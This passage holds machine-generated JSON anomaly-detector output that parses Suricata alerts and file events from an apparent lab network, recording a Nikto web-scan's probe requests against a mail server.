"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80", "/parser/model/time": 1583349514.208607, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46820, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.208607 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46820 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.ini", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.208779, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":78486216256524,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.ini\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.ini", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46820, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":78486216256524,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 78486216256524, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.208779+0000\",\"flow_id\":78486216256524,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46820,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.ini\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.ini\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80", "/parser/model/time": 1583349514.210292, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46822, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.210292 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46822 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.inc+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.210515, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":684282763424512,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.inc+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.inc+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46822, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":684282763424512,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 684282763424512, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.210515+0000\",\"flow_id\":684282763424512,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46822,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.inc+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.inc+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80", "/parser/model/time": 1583349514.211929, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46824, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.211929 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46824 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.21 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.idq", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.212088+0000\",\"flow_id\":785974704093502,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.212088, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":785974704093502,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.idq\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.idq\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.idq\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.idq", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46824,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46824, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", 